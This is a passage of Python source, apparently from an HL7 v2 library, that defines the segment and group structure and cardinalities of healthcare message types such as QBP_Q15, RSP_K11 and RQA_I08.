('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RDF', SEGMENTS['RDF'], (0, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Q15': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('ANYHL7SEGMENT', SEGMENTS['ANYHL7SEGMENT'], (0, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Q21': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Qnn': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RDF', SEGMENTS['RDF'], (0, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Z73': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),)),
'QCK_Q02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),)),
'QCN_J01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QID', SEGMENTS['QID'], (1, 1), 'SEG'),)),
'QRY': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),)),
'QRY_A19': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),)),
'QRY_PC4': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),)),
'QRY_Q01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QRY_Q02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QRY_R02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (1, 1), 'SEG'),)),
'QSB_Q16': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QVR_Q17': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('QVR_Q17_QBP', GROUPS['QVR_Q17_QBP'], (0, 1), 'GRP'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RAR_RAR': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RAR_RAR_DEFINITION', GROUPS['RAR_RAR_DEFINITION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RAS_O17': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RAS_O17_PATIENT', GROUPS['RAS_O17_PATIENT'], (0, 1), 'GRP'),
('RAS_O17_ORDER', GROUPS['RAS_O17_ORDER'], (1, -1), 'GRP'),)),
'RCI_I05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('RCI_I05_PROVIDER', GROUPS['RCI_I05_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('RCI_I05_OBSERVATION', GROUPS['RCI_I05_OBSERVATION'], (0, -1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RCL_I06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('RCL_I06_PROVIDER', GROUPS['RCL_I06_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('DSP', SEGMENTS['DSP'], (0, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RDE_O11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RDE_O11_PATIENT', GROUPS['RDE_O11_PATIENT'], (0, 1), 'GRP'),
('RDE_O11_ORDER', GROUPS['RDE_O11_ORDER'], (1, -1), 'GRP'),)),
'RDR_RDR': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RDR_RDR_DEFINITION', GROUPS['RDR_RDR_DEFINITION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RDS_O13': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RDS_O13_PATIENT', GROUPS['RDS_O13_PATIENT'], (0, 1), 'GRP'),
('RDS_O13_ORDER', GROUPS['RDS_O13_ORDER'], (1, -1), 'GRP'),)),
'RDY_K15': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('DSP', SEGMENTS['DSP'], (0, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'REF_I12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RF1', SEGMENTS['RF1'], (0, 1), 'SEG'),
('REF_I12_AUTHORIZATION_CONTACT', GROUPS['REF_I12_AUTHORIZATION_CONTACT'], (0, 1), 'GRP'),
('REF_I12_PROVIDER_CONTACT', GROUPS['REF_I12_PROVIDER_CONTACT'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('REF_I12_INSURANCE', GROUPS['REF_I12_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('REF_I12_PROCEDURE', GROUPS['REF_I12_PROCEDURE'], (0, -1), 'GRP'),
('REF_I12_OBSERVATION', GROUPS['REF_I12_OBSERVATION'], (0, -1), 'GRP'),
('REF_I12_PATIENT_VISIT', GROUPS['REF_I12_PATIENT_VISIT'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RER_RER': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RER_RER_DEFINITION', GROUPS['RER_RER_DEFINITION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RGR_RGR': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RGR_RGR_DEFINITION', GROUPS['RGR_RGR_DEFINITION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RGV_O15': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RGV_O15_PATIENT', GROUPS['RGV_O15_PATIENT'], (0, 1), 'GRP'),
('RGV_O15_ORDER', GROUPS['RGV_O15_ORDER'], (1, -1), 'GRP'),)),
'ROR_ROR': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('ROR_ROR_DEFINITION', GROUPS['ROR_ROR_DEFINITION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RPA_I08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('RF1', SEGMENTS['RF1'], (0, 1), 'SEG'),
('RPA_I08_AUTHORIZATION_1', GROUPS['RPA_I08_AUTHORIZATION_1'], (0, 1), 'GRP'),
('RPA_I08_PROVIDER', GROUPS['RPA_I08_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('RPA_I08_INSURANCE', GROUPS['RPA_I08_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('RPA_I08_PROCEDURE', GROUPS['RPA_I08_PROCEDURE'], (1, -1), 'GRP'),
('RPA_I08_OBSERVATION', GROUPS['RPA_I08_OBSERVATION'], (0, -1), 'GRP'),
('RPA_I08_VISIT', GROUPS['RPA_I08_VISIT'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RPI_I01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('RPI_I01_PROVIDER', GROUPS['RPI_I01_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('RPI_I01_GUARANTOR_INSURANCE', GROUPS['RPI_I01_GUARANTOR_INSURANCE'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RPI_I04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('RPI_I04_PROVIDER', GROUPS['RPI_I04_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('RPI_I04_GUARANTOR_INSURANCE', GROUPS['RPI_I04_GUARANTOR_INSURANCE'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RPL_I02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('RPL_I02_PROVIDER', GROUPS['RPL_I02_PROVIDER'], (1, -1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('DSP', SEGMENTS['DSP'], (0, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RPR_I03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('RPR_I03_PROVIDER', GROUPS['RPR_I03_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RQA_I08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RF1', SEGMENTS['RF1'], (0, 1), 'SEG'),
('RQA_I08_AUTHORIZATION', GROUPS['RQA_I08_AUTHORIZATION'], (0, 1), 'GRP'),
('RQA_I08_PROVIDER', GROUPS['RQA_I08_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('RQA_I08_GUARANTOR_INSURANCE', GROUPS['RQA_I08_GUARANTOR_INSURANCE'], (0, 1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('RQA_I08_PROCEDURE', GROUPS['RQA_I08_PROCEDURE'], (0, -1), 'GRP'),
('RQA_I08_OBSERVATION', GROUPS['RQA_I08_OBSERVATION'], (0, -1), 'GRP'),
('RQA_I08_VISIT', GROUPS['RQA_I08_VISIT'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RQC_I05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('RQC_I05_PROVIDER', GROUPS['RQC_I05_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RQI_I01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RQI_I01_PROVIDER', GROUPS['RQI_I01_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('RQI_I01_GUARANTOR_INSURANCE', GROUPS['RQI_I01_GUARANTOR_INSURANCE'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RQP_I04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RQP_I04_PROVIDER', GROUPS['RQP_I04_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RQQ_Q09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('ERQ', SEGMENTS['ERQ'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RRA_O18': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RRA_O18_RESPONSE', GROUPS['RRA_O18_RESPONSE'], (0, 1), 'GRP'),)),
'RRD_O14': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RRD_O14_RESPONSE', GROUPS['RRD_O14_RESPONSE'], (0, 1), 'GRP'),)),
'RRE_O12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RRE_O12_RESPONSE', GROUPS['RRE_O12_RESPONSE'], (0, 1), 'GRP'),)),
'RRG_O16': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RRG_O16_RESPONSE', GROUPS['RRG_O16_RESPONSE'], (0, 1), 'GRP'),)),
'RRI_I12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (0, 1), 'SEG'),
('RF1', SEGMENTS['RF1'], (0, 1), 'SEG'),
('RRI_I12_AUTHORIZATION_CONTACT', GROUPS['RRI_I12_AUTHORIZATION_CONTACT'], (0, 1), 'GRP'),
('RRI_I12_PROVIDER_CONTACT', GROUPS['RRI_I12_PROVIDER_CONTACT'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('RRI_I12_PROCEDURE', GROUPS['RRI_I12_PROCEDURE'], (0, -1), 'GRP'),
('RRI_I12_OBSERVATION', GROUPS['RRI_I12_OBSERVATION'], (0, -1), 'GRP'),
('RRI_I12_PATIENT_VISIT', GROUPS['RRI_I12_PATIENT_VISIT'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RSP_K11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RSP_K11_ROW_DEFINITION', GROUPS['RSP_K11_ROW_DEFINITION'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_K21': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RSP_K21_QUERY_RESPONSE', GROUPS['RSP_K21_QUERY_RESPONSE'], (0, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_K23': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RSP_K23_QUERY_RESPONSE', GROUPS['RSP_K23_QUERY_RESPONSE'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_K25': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('RSP_K25_STAFF', GROUPS['RSP_K25_STAFF'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_K31': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('RSP_K31_RESPONSE', GROUPS['RSP_K31_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_Q11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RSP_Q11_QUERY_RESULT_CLUSTER', GROUPS['RSP_Q11_QUERY_RESULT_CLUSTER'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_Z82': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('RSP_Z82_QUERY_RESPONSE', GROUPS['RSP_Z82_QUERY_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_Z86': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RSP_Z86_QUERY_RESPONSE', GROUPS['RSP_Z86_QUERY_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_Z88': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('RSP_Z88_QUERY_RESPONSE', GROUPS['RSP_Z88_QUERY_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (1, 1), 'SEG'),)),
'RSP_Z90': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('RSP_Z90_QUERY_RESPONSE', GROUPS['RSP_Z90_QUERY_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (1, 1), 'SEG'),)),
'RTB_K13': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RTB_K13_ROW_DEFINITION', GROUPS['RTB_K13_ROW_DEFINITION'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RTB_Knn': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
